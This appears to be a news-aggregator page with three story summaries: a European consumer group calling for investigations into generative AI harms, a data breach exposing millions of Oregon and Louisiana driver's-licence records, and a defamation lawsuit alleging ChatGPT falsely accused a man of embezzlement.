An anonymous reader quotes a report from TechCrunch: European regulators are at a crossroads over how AI will be regulated -- and ultimately used commercially and non-commercially -- in the region, and today the EU's largest consumer group, the BEUC, weighed in with its own position: stop dragging your feet, and "launch urgent investigations into the risks of generative AI" now, it said. "Generative AI such as ChatGPT has opened up all kinds of possibilities for consumers, but there are serious concerns about how these systems might deceive, manipulate and harm people. They can also be used to spread disinformation, perpetuate existing biases which amplify discrimination, or be used for fraud," said Ursula Pachl, Deputy Director General of BEUC, in a statement. "We call on safety, data and consumer protection authorities to start investigations now and not wait idly for all kinds of consumer harm to have happened before they take action. These laws apply to all products and services, be they AI-powered or not and authorities must enforce them."

The BEUC, which represents consumer organizations in 13 countries in the EU, issued the call to coincide with a report out today (PDF) from one of its members, Forbrukerradet in Norway. That Norwegian report is unequivocal in its position: AI poses consumer harms (the title of the report says it all: "Ghost in the Machine: addressing the consumer harms of generative AI") and poses numerous problematic issues. It highlights, for example, how "certain AI developers including Big Tech companies" have closed off systems from external scrutiny making it difficult to see how data is collected or algorithms work; the fact that some systems produce incorrect information as blithely as they do correct results, with users often none the wiser about which it might be; AI that's built to mislead or manipulate users; the bias issue based on the information that is fed into a particular AI model; and security, specifically how AI could be weaponized to scam people or breach systems. [...]

The AI Law, when implemented, will be the world's first attempt to try to codify some kind of understanding and legal enforcement around how AI is used commercially and non-commercially. The next step in the process is for the EU to engage with individual countries in the EU to hammer out what final form the law will take -- specifically to identify what (and who) would fit into its categories, and what will not. The question will be in how readily different countries agree together. The EU wants to finalize this process by the end of this year, it said. "It is crucial that the EU makes this law as watertight as possible to protect consumers," said Pachl in her statement. "All AI systems, including generative AI, need public scrutiny, and public authorities must reassert control over them. Lawmakers must require that the output from any generative AI system is safe, fair and transparent for consumers."

Security

Millions of Americans' Personal Data Exposed in Global Hack (cnn.com) 17

Millions of people in Louisiana and Oregon have had their data compromised in the sprawling cyberattack that has also hit the US federal government, state agencies said late Thursday. From a report: The breach has affected 3.5 million Oregonians with driver's licenses or state ID cards, and anyone with that documentation in Louisiana, authorities said. The Louisiana governor's office did not put a number on the number of victims but over 3 million Louisianians hold driver's licenses, according to public data. The states did not blame anyone in particular for the hack, but federal officials have attributed a broader hacking campaign using the same software vulnerability to a Russian ransomware gang. The sweeping hack has likely exposed data at hundreds of organizations across the globe and also compromised multiple US federal agencies, including the Department of Energy, as well as data from major corporations in Britain like the BBC and British Airways. The Russian-speaking hackers that claimed credit are known to demand multimillion-dollar ransoms, though US and state governments say they have not received any demands.

AI

Man Sues OpenAI Claiming ChatGPT 'Hallucination' Said He Embezzled Money 107

OpenAI is facing a defamation lawsuit filed by Mark Walters, who claims that the AI platform falsely accused him of embezzling money from a gun rights group in statements delivered to a journalist. The lawsuit argues that ChatGPT is guilty of libel and alleges that the AI system "hallucinated" and generated false information about Walters. The Register reports: "While research and development of AI is worthwhile, it is irresponsible to unleash a system on the public that is known to make up 'facts' about people," his attorney John Monroe told The Register. According to the complaint, a journalist named Fred Riehl, while he was reporting on a court case, asked ChatGPT for a summary of accusations in a complaint, and provided ChatGPT with the URL of the real complaint for reference. (Here's the actual case [PDF] the reporter was trying to save time on reading for those curious.)

What makes the situation even odder is that the case Riehl was reporting on was actually filed by a group of several gun rights groups against Washington's Attorney General's office (accusing officials of "unconstitutional retaliation", among other things, while investigating the groups and their members) and had nothing at all to do with financial accounting claims. When Riehl asked for a summary, instead of returning accurate information, or so the case alleges, ChatGPT "hallucinated" that Mark Walters' name was attached to a criminal complaint -- and moreover, that it falsely accused him of embezzling money from The Second Amendment Foundation, one of the organizations suing the Washington Attorney General in the real complaint.

ChatGPT is known to "occasionally generate incorrect information" -- also known as hallucinations, as The Register has extensively reported. The AI platform has already been accused of writing obituaries for folks who are still alive, and in May this year, of making up fake legal citations pointing to non-existent prior cases. In the latter situation, a Texas judge said his court would strike any filing from an attorney who failed to certify either that they didn't use AI to prepare their legal docs, or that they had, but a human had checked them. [...] According to the complaint, Riehl contacted Alan Gottlieb, one of the plaintiffs in the actual Washington lawsuit, about ChatGPT's allegations concerning Walters, and Gottlieb confirmed that they were false. None of ChatGPT's statements concerning Walters are in the actual complaint.

The false answer ChatGPT gave Riehl alleged that Walters was treasurer and Chief Financial Officer of SAF and claimed he had "embezzled and misappropriated SAF's funds and assets." When Riehl asked ChatGPT to provide "the entire text of the complaint," it returned an entirely fabricated complaint, which bore "no resemblance to the actual complaint, including an erroneous case number." Walters is looking for damages and lawyers' fees. We have asked his attorney for comment. As for the amount of damages, the complaint says these will be determined at trial, if the case actually gets there.
